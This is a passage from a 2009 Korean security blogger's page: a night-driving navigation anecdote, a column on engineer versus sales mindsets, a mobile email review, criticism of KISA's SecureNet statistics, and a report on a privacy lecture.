즉, 근처에서 고속도로 IC가 있어서 고속도로를 탈수 있다는 것이다...아...네비보다 그 한마디가 더 확신으로 다가 오는 것이 아닌가?

그때 아마도 그 사장님이

" 아..어쩌나 길을 잘못 들어와서 여기서 고속도로 IC로 갈려면 1-2시간을 가야 하는데..한참 잘못 오셨습니다." 라고 말했다면 난 아마도 이 멍청한 네비야 하며 아주 부셔버렸을 것이다.

갈길이 멀기에 잠깐 인사를 하고 명함을 한장 건네 주었다., 그리고 혹시 부산에 오실 일이 있으면 연락한번 달라고 하며 그 주유소를 벗어났다. 그려면서 이것도 추억거리일 것 같아서 몇장의 사진을 찍었다.  아마도 그 사장님은 차가 가다가 갑자기 서서 밖에 나와 사진찍고 하니까 혹시 의아해 했을지도 모르겠다..하지만 블로거 본능은 어쩔수 없다.. 사장님 주유소 잘 되길 바라겠습니다.

지나가는 주유하시는 운전자분들에게 따뜻한 커피 한잔 건네시는 그 마음이면 주유소가 잘 될듯 합니다..아마도 전남 화순군 동북면인가 822번 지방도 가다가 행운휴게소, 유천주유소가 있으면 기름도 좀 넣으시고 해 주시면 좋겠네요..아마도 너무 한적해서 그 사장님도 사람을 만나면 반가울듯 하였습니다.



그 사장님 말씀대로 약 10여 KM 가다보니 주암IC가 나왔습니다. 역시 네비도 똑똑하게 안내를 하고 있었던 것입니다. 단지 제가 그 네비를 못 믿었던 것입니다.

주암IC 통과시간이 8시40분



그때부터 다시 호남고속도로로 진입을 하여 부산까지 무사히 오게 되었습니다. 초행길에 어쩔수 없이 믿고 사용하는 네비게이션 그러나 모로가든 서울만 간다는 식으로 안내는 하지만 잘못 안내시에는 어쩔수 없이 믿고 따라가야만 하는 안내자..

나는 네비를 믿지 못했고 네비는 아주 한적한 지방국도 그 깜깜한 11월 늦은 가을에 전남 화순군 어떤 시골 읍내를 지나 한적한 지방도를 지나고 있노라니 정말 네비를 믿어야 하나 말아야 하나 하는 생각이 들었다. 그도 그럴것이 차량에 기름이 얼마 없었기에 더욱 조바심이 났었다.

네비에 울고 네비에 웃었지만, 아마도 네비따라 특히 야간에 잘못 길을 들어 헤메었던 분들은 많은 공감을 하지 않았을까 하는 생각이 든다. 따라서 지금처럼 먼길 떠날때에는 기름이라도 빵빵하게 넣고 다녀야겠다. 아주 좋은 추억으로 남을꺼 같고 이번 광주 출장길은 기억에 남을꺼 같다.

덕분에 전남 화순군 화순읍과 기타 그 알지 못하는 지명이 있는 동래에서 길을 잘못들어 이길 저길 다니면서 네비 경로를 몇번이나 재설정하면서 다닌 기억은 길이길이 남을꺼 같다. 운전자들이여 네비를 끝까지 믿어보자.






'Lecture&Comlumn' 카테고리의 다른 글

2009 함께@넷세상 인터넷 미디어대전 우수상 받던날 - (1)  (8) 2009/12/10
[기고-5] 마소잡지 "2009년 올 한해 보안 이슈"  (4) 2009/12/05
[강연-12] 전남도 지방공무원 교육원 강의 후기  (0) 2009/11/14
[칼럼-104] 영업 마인드 & 엔지니어 마인드, 결국은 CEO 마인드  (10) 2009/11/11
[강연-11] 회원제 유통회사에서 개인정보보호에 대한 관리방안 및 보안 사항  (0) 2009/11/10
[칼럼-103] 안철수 교수님이 말하는 리더의 자질 3요소  (2) 2009/11/04
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

IT 프로를 위한 포켓북 시리즈

Operating System/Windows 2009/11/13 06:46

MS에서 제공하는 윈도우 관련포켓북 시리즈로 읽어 보시면 아주 유용한 자료가 많은 문서가 있어 공유 하고자 합니다. 

출처는 http://blogs.technet.com/koalra/archive/2007/02/26/it-pro.aspx 이고 혹시 링크가 추후 깨지거나 할 경우를 대비하여 관련 파일까지 함께 올려 봅니다.

참고 하시고 여러가지 도움되는 사항이 많이 있으니 시간 있을실때 틈틈히 읽어 보시고 내공을 많이 쌓으시기 바랍니다. 페이지수가 많군요..

첨부파일 한계가 있어 업로드 하지 못한 파일은 링크로 가서 직접 다운로드 받기 바랍니다...압축해도 다 못올리겠네요..

SecurityGuidanceHandbook.zip

'Operating System > Windows' 카테고리의 다른 글

윈도우 2008 라이선스 데이터 쉬트  (0) 2009/11/18
윈도우 2008 서비스팩 2로 패치하기  (0) 2009/11/16
IT 프로를 위한 포켓북 시리즈  (2) 2009/11/13
IIS 6.0의 보안 취약점  (0) 2009/05/17
윈도우보안, 체크유틸리티 사용법-MBSA  (10) 2009/02/17
Outlook Express 메일 백업 받기  (2) 2009/01/16
Posted by 엔시스
트랙백 0, 댓글 2개가 달렸습니다

Security awareness

Security Movie 2009/11/11 23:52




동물도 일정한 규칙으로 인식 시키면 말을 듣는군요...보안도 인식(awareness)이 중요 합니다.


'Security Movie' 카테고리의 다른 글

이것이 우리나라 보안현실이다.  (2) 2009/12/17
XP 패스워드 크랙 동영상  (2) 2009/12/02
Security awareness  (0) 2009/11/11
원격 리모트 해킹 동영상  (0) 2009/10/31
[동영상] 교통표지판 해킹  (2) 2009/10/21
[동영상] 개발자 어린 아이 잠 재우기  (7) 2009/10/14
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

[칼럼-104] 영업 마인드 & 엔지니어 마인드, 결국은 CEO 마인드

Lecture&Comlumn 2009/11/11 09:52


엔지니어 마인드

보안쪽에 관심이 많으면 처음에 보통 기술적으로 접근을 많이 하게 된다. 우리가 흔히 말하는 엔지니어로 출발을 하게 되는 것이다. 물론  모든 사람이 그렇다는 것은 아니지만 보통 그렇게 출발을 한다. 그렇게 3-4년 정도 기술지원을 지원을 하다보면 회사에 지위도 올라가고 책임과 역할에 비중이 높아진다. 
                                                                                                
그리고 점차 기술적인 부분보다는 관리적인 부분으로 자연스럽게 넘어가게 되면서 기술에서 멀어지는 경우가 대부분이다. 그렇기에 나이가 들면 기술적인 노하우는 평소에 갈고 닦지 않으면 젊은 엔지니어들에게 뒤쳐지게 마련이다.


그런데 문제는 엔지니어의 경우 기술적 노하우가 우선시 되기에 편협한 시각을 보는 경우가 많다. 그래서 최고의 실력이 우선시 하게 되고 쉽게 타인과 협상시에 자신의 의견을 굽히지 않고 타협하지 않으려는 성향이 강하다. 그것은 곧 자신의 기술을 굽히는 자존심기도 하기 때문이다.

그래서 흔히 듣는 말이 바로 " 엔지니어 마인드" 란 말이다. 사실, 엔지니어들은 그런 말을 들으면 그리 썩 유쾌하지는 않다. 무엇인가 고집스럽고 자기주장이 강하다는 느낌을 풍기는 말 같이 들리기 때문이다. 꼭 자신은 그 엔지니어 마인드 때문에 그렇지 않다라고 말하지만 상대방은 그렇게 보기 때문이다.

또한, 엔지니어는 무엇인가 성과를 이루어도 그다지 그것이 성과지표로 나타나는 경우가 잘 드물다. 분명히 좋은 기술이고 능력있는 엔지니어지만 눈에 확 들어오는 그 무엇인가 2% 부족하다는 느낌이 항상든다. 그래서 조직의 승진에서 밀리는 경우가 많다.


영업 마인드

조직의 꽃은 "영업"이라는 말도 있듯이 기업의 최전선에서 발로 뛰는 이들이 바로 영업맨들이다. 조직에서 최선을 다해 만든 제품을 판매하는 조직이 바로 영업맨들이다. 영업의 경우 자기 제품에 대한 충분한 이해가 있어야 하고 또 여기저기 다니면서 많은 사람들을 만난다.

따라서 영업을 하는 사람들은 그만큼 듣고 보고 느끼는 시야가 넓어지게 마련이다. 나는 사람은 반드시 체험의 동물이라 생각을 한다. 그 사람이 체험해 보지 않고는 절대 그에 상응하는 느낌을 갖지 못한다 생각하는 사람중에 하나이다. 그래서 반드시 체험을 해 보아야 한다. 아마도 방송 프로그램에서도 나오는 그 프로그램이 그래서 장수프로그램으로 가는게 아닌가 하는 생각을 한다.

아무튼, 자신의 제품을 판매를 하려면 간혹, 여러가지 감언이설을 하는 경우도 있다. 자기 제품에 대한 최대장점을 살리고 단점은 말하지 않는 어쩌면 단점을 말할수 없는 그런 애로사항을 가지고 있기도 하다. 모든게 완벽할수는 없다.. 최소한에 판매에 지장이 없는 한도내에서 단점은 감수해야만 한다.

그런데 문제는 일반 조직에서 영업에서 우선 판매가 이루어지고 그 이후에 엔지니어가 일을 하는 형태가 일반적이다. 그런데 늘 영업에 있는 사람들은 엔지니어에게 "엔지니어 마인드"를 고치라는 충고를 가끔한다. 또한 엔지니어 입장에서는 무조건 팔고 보자는 식의 뒷 감당 안되는 경우를 맞이하여 그것을 영업에게 화살을 돌리는 경우도 있다. 그래서 영업과 엔지니어는 잘 절충하고 아주 친하게 지내야 한다. 또한 조직내에서 영업이란 성과지표가 뚜렷이 나타난다. 잘하면 잘한대로 못하면 못한대로 바로 매출로서 나타나게 되는 것이다. 그래서 성공한 사람들은 대부분 영업출신이 많다. 그만큼 결과 지표로 인정을 받는다는 것이다.

하나의 조직이 잘 굴러갈려면 이러한 톱니바퀴가 잘 굴러 가야 하는 것은 당연한 것이다. 하지만 조금만 장기적인 안목에서 바라본다고 하면 분명 편차가 있는 것은 사실이다.

조금 더 현실감 있게 생각해 보자.

만약, 당신이 어떤 기업에 CEO라고 치자. 한 조직에 CEO는 무엇에 의하여 결정이 되겠는가? 그렇다. 바로 매출이다. 여러가지 경영철학도 있고 사람 됨됨이도 있지만 결국에는 주주들에게 무엇인가를 결과를 안겨 줄수 있는 가장 큰 그림은 바로 '매출'인 것이다. 물론 매출에 따른 영업이익도 있어야 겠다. 매출은 있지만 밑지는 장사를 했다면 그것은 잘못 경영을 했다는 반증일 것이다.

결국 팔아야 하는것이다. 조금 더 자세히 들려다 보면 재미있는 현상을 발견할수 있다. 엔지니어로 살지만, 영업맨으로 살지만 누구나 조직의 최고 수장이 되기를 바라는 것은 똑같은 직장인의 희망이다. 그래서 열심히 발버둥을 치는 것이다. 살아남으려고..
만약, 난 그냥 이대로 살래..더 이상 욕심 없어..머리 복잡하게 왜 그렇게 살어..그냥 누가 시키면 시키는대로 그대로 살래..라고 하는 사람이 있다면 그 사람은 욕심이 없는 사람이고 결국은 패배자일 것이다.(지극히 주관적인 제 개인 생각임.)

조직내 지위가 올라가고 점점 엔지니어에서 멀어지면서 관리를 담당하게 되고 조직내에 중요 책임자의 위치에 올라가면 결국은 영업맨이 아니더라도 '영업'을 해야만 하는 것이다. 그것이 지금까지 겪어온 또는 앞으로 겪어갈 대부분의 선배들의 절차였고 또한 후배들이 그러한 전철을 밟고 있는 것이다.


마무리글

그래서 우리는 바로 'CEO 마인드를 갖자' 라고 외치고 있는 것이다. 하지만 늘 고용인과 피고용인의 관계는 어렵기만 하다.
말은 좋은 말이라고 생각하지만 쉽게 실천할수만 있는 것은 아니기 때문이다. 우리는 늘 장기적인 안목을 가지고 자신의 계획과 플랜을 세울 필요가 있다. 나이가 들어감에 따라 엔지니어라 할지라도 결국은 무엇인가를 팔아야 할 처지에 놓여진다. 그것은 극명한 사실이고 받아들이지 않으려고 해도 받아들여야만 하는 현실이다.



한살이라도 덜 먹었을때 스스로 조금 더 포괄적으로 바로 볼수 있고 무엇이 자신에게 득이 될수 있는지를 바라볼수 있는 마인드를 가진다면 그 사람은 반드시 성공을 할 것이다. 지금이야 "영업마인드" "엔지니어 마인드" 로 이야기 하지만 어느순간 조직에 있던 자영업을 하던 창업을 하던 스스로가 무엇인가를 팔아야만 하는 위치에 서야 할때 충분히 사전에 이런 준비 자세가 되어 있다고 한다면 훨씬 더 쉽고 더 당당하고 더 자신감 있게 자신의 존재감과 능력을 남들에게 보여 주며 판매 할수 있지 않을까 생각이 된다. @엔시스.


'Lecture&Comlumn' 카테고리의 다른 글

[기고-5] 마소잡지 "2009년 올 한해 보안 이슈"  (4) 2009/12/05
[강연-12] 전남도 지방공무원 교육원 강의 후기  (0) 2009/11/14
[칼럼-104] 영업 마인드 & 엔지니어 마인드, 결국은 CEO 마인드  (10) 2009/11/11
[강연-11] 회원제 유통회사에서 개인정보보호에 대한 관리방안 및 보안 사항  (0) 2009/11/10
[칼럼-103] 안철수 교수님이 말하는 리더의 자질 3요소  (2) 2009/11/04
[강의-10] 일자리 창출 "정보보호일반" 과정 강의  (0) 2009/10/31
Posted by 엔시스
TAG CEO 마인드를 갖자, 엔지니어마인드, 영업마인드
트랙백 3, 댓글 10개가 달렸습니다

문자와 오즈 메일 서비스의 조화

My Hobby/Device Review 2009/11/11 08:45


휴대폰에서 메일확인 자유자롭게

오즈에서 부가서비스로 이메일 서비스를 확인하는 부가서비스를 사용하고 있습니다. 월에 메일 계정당 1개에 1000원의 사용료를 내야 하는 서비스입니다.

오늘 잠시 밖에 나와 있는데  갑자기 문자 하나가 날라 왔습니다. 확인을 해 보니 국제보안자격증인 CISSP자격증에 대한 문의 사항을 메일로 보냈다는 내용이었습니다.


이메일을 보냈다는 문자


외부에 있을때 이렇게 이메일을 보냈다는 문자를 받으면 상당히 궁금한 경우가 많습니다. 특히 업무적인 부분에 있어서는 중요한 메일의 경우에는 예전엔 가까운 PC방을 달려가서 PC에서 이메일을 확인했어야만 했습니다.

하지만, 이제는 모바일 휴대폰에서도 이메일 서비스가 가능합니다..이렇게 사용할수 있는 것은 아무래도 오즈 무한자유 데이터요금제를 쓰고부터 이렇게 마음 놓고 사용할수 있겠지요.




이렇게 바로 모바일 인터넷을 이용하여 이메일을 확인을 하니 무슨 메일이 왔는지 바로 알수 있겠더군요. 사실, 직장인에게는 업무용 이메일 서비스는 아주 유용한 서비스인듯 합니다.

요즘 왠만한 웹메일이 POP3를 지원하기 때문에 이메일을 한곳으로 포워딩 시켜 놓고 그 계정만 이렇게 등록을 시켜 놓으면 아주 유용하게 이메일을 확인 할수 있습니다. 이제는 가까운 PC방을 찾지 않아도 되고 그냥 바로 손안에서 이메일 업무를 바로 뚝딱하고 해 치울수 있습니다.

급한 이메일은 이렇게 휴대폰으로 처리하고 그렇지 않는 이메일은 사무실에 들어와서 처리를 하면 되겠죠...아무튼 이런저런 서비스를 이용하면서 여러가지 많은 것을 알아 가게 되는군요..@엔시스.




 

'My Hobby > Device Review' 카테고리의 다른 글

오즈 무한자유정액제로 이젠 네이버 블로깅까지  (8) 2009/11/27
오즈사주카페 -심심풀이 땅콩, 오늘의 운세  (0) 2009/11/18
문자와 오즈 메일 서비스의 조화  (2) 2009/11/11
아레나, 오즈에서 지식 서비스를  (1) 2009/10/26
LGT 오즈와 함께한 결혼 10주년  (1) 2009/10/12
아레나, 오즈 추천사이트 -제사상과 한복 입기  (0) 2009/10/06
Posted by 엔시스
TAG 아레나, 오즈, 이메일서비스
트랙백 0, 댓글 2개가 달렸습니다

시큐어넷, 웜,해킹바이러스 통계 활용 안되고 있어 아쉬워

Security Policy 2009/11/11 06:54


한국인터넷진흥원(이하 KISA)에서 야심차게 준비하고 오픈 하였던 참여형 지식정보보안 포털 사이트 시큐어넷 (http://www.securenet.or.kr) 사이트가 운영중에 있습니다.  이 사이트에는 처음 의도는 정보보호/보안 전문가들이 직접 참여 하여 이끌어가는 취지로 오픈이 되었습니다.

그중에 하나의 장점이었던 웜,바이러스,개인정보보호 통계를 월별로 웹사이트로 알려주는 메뉴가 있었습니다. 그런데 2008년 기점으로 하여 어느순간인가 웹사이트에서 나타나고 있지 않습니다.

사실, 보안문서나 발표 자료 등을 만들때 제일 필요한 것이 객관적이고 신뢰 할수 있는 기관에 통계수치를 인용하는 것인데 사실 그러한 믿을수 있는 통계수치를 일반 사용자가 이용하는데에는 한계가 있습니다. 이 사이트에 통계수치가 멈추기 전까지는 잘 이용했던 핵심 메뉴중에 하나였습니다.

웜,바이러스 통계정보가 없습니다.

개인정보에 대한 접수현황 통계가 없습니다.

 

개설도 중요하지만 관건은 어떻게 잘 운영하느냐가 더 중요

처음 취지와는 별도로 지금은 그다지 잘 운영되고 있다는 느낌은 들수가 없습니다. 웹사이트는 방문자가 없더라도 주요 콘텐츠를 이용하여 끊임없이 꾸준히 업데이트 해 줄때 돌렸던 발길도 다시 오게 만들수 있는 것입니다. 그렇지 않으면 결국 만들어 높고 운영 안하자니 그렇고 운영하자니 사람 손만 가는 인력 낭비와 신경을 써야 되는 부분들이 있습니다.

따라서, 시큐어넷에 일반적인 보안뉴스나 기사를 올리는 것 보다는 조금 더 내실 있는 통계수치를 제공해 줄수 있는 웹사이트 운영에 대하여 제안을 해 보겠습니다.,

멈추었던 월별 각 보안관련 통계 수치를 일반 사용자들에게 오픈하여 보다 보안의 적극적인 활동에 소중한 데이터 자료로 활용되어지는 날이 오길 기대해 보겠습니다. @엔시스.

'Security Policy' 카테고리의 다른 글

KISA, 보안 커뮤니티도 적극 지원 활용해야  (2) 2009/12/22
사이버보안관 3000명 인력양성, 백지화 되나?  (2) 2009/11/19
시큐어넷, 웜,해킹바이러스 통계 활용 안되고 있어 아쉬워  (0) 2009/11/11
정보보호전문가 자격증이 국가기술자격증으로 빨리 되어야 하는 이유  (0) 2009/10/09
윤제균 '해운대' 영화감독, 정보보호 홍보대사에 바라는 점  (0) 2009/10/07
한국인터넷진흥원(KISA) 지방 지사설립은 어떨까?  (4) 2009/09/21
Posted by 엔시스
TAG IT, KISA, 시큐어넷, 한국인터넷진흥원
트랙백 0, 댓글 0개가 달렸습니다.

[강연-11] 회원제 유통회사에서 개인정보보호에 대한 관리방안 및 보안 사항

Lecture&Comlumn 2009/11/10 21:36


오늘은 코스트코 부산점에서 개인정보보호에 대한 강연을 하였다. 최근 유통 할인점으로서는 첫 개인정보보호 교육인거 같다. 물론 담당자들은 교육기관에서 교육을 받았는지 모르겠지만 직접 사업장으로 불러서 교육 받는 것은 처음이 아닐까 하는 생각을 한다.

비가 오는 관계로 미리 출발하여 시간적 여유를 가지고 갔으나 상당히 빨리 도착하는 바램에 담당자분도 너무 일찍 오셨다고 하면서 따뜻히 맞이해 주었다.

그래서 회의실에서 먼저 강의할 노트북과 동영상 파일을 준비해 갔는데 시간적 여유도 있고 하니 천천히 테스트를 해 보았다. 담당자분께서 미리 준비를 다 해 놓으셨다. 준비가 철처하신 분 같았다. 하지만 준비해간 동영상에 코덱을 설치하라는 메세지가 나와서 어쩔수 없이 제가 준비해간 노트북을 사용하였다.

강연을 자주 다니다 보니 몇가지 준비해야 할 사항이 있다. 그중에 하나가 노트북은 반드시 준비를 해 가야한다. 특히 강연하기전에 테스트는 기본이다. 만약 노트북을 준비해 가지 않고 파일만 usb에 담아간다면 현장 변수로 인하여 당황스러울때가 있다.

그렇게 강의 준비를 마치고 남는 시간에 매장을 한번 둘러 보았다. 매장이 7월쯤에 오픈 하였다고 하면서 상당히 천정이 높고 많은 제품들이 있었다. 한가지 특이점은 회원제로 운영이 되어 회원카드가 없으면 입장을 안 시키고 있었다.

교육하면서 간식거리 준비해둔 교육장

교육하게 될 첫 파워포인트 슬라이드

강사에게만 특별히 준 별다방 캔커피

소수 인원으로 교육을 하여 재미있게 할수 있었으며 최근 이슈가 되고 있는 동영상을 몇가지 준비하여 조금 더 효율적인 강연이 되지 않았나 하는 생각이 든다.

코스트코 부산점 개인정보보호 교육중


이렇게하여 올해 개인정보보호에 대한 교육을 또 한곳에 가서 마쳤다. 강연을 하면서 개인적으로 보안에 대한 사명과 어떻게 하면 한 사람이라도 보안위협에서 벗어나고 보안의 무지에서 일깨워 줄수 있을까 하는 느낌으로 늘 열정을 다해서 이야기 한다. 하지만 몇명이나 도움이 되고 하였는지는 잘 모르겠지만 이번 교육은 나름 호응이 좋았던거 같다고 자평을 해 본다.

'Lecture&Comlumn' 카테고리의 다른 글

[강연-12] 전남도 지방공무원 교육원 강의 후기  (0) 2009/11/14
[칼럼-104] 영업 마인드 & 엔지니어 마인드, 결국은 CEO 마인드  (10) 2009/11/11
[강연-11] 회원제 유통회사에서 개인정보보호에 대한 관리방안 및 보안 사항  (0) 2009/11/10
[칼럼-103] 안철수 교수님이 말하는 리더의 자질 3요소  (2) 2009/11/04
[강의-10] 일자리 창출 "정보보호일반" 과정 강의  (0) 2009/10/31
[강연-9] 전파 관리소 강연 -2009.10.26  (0) 2009/10/31
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.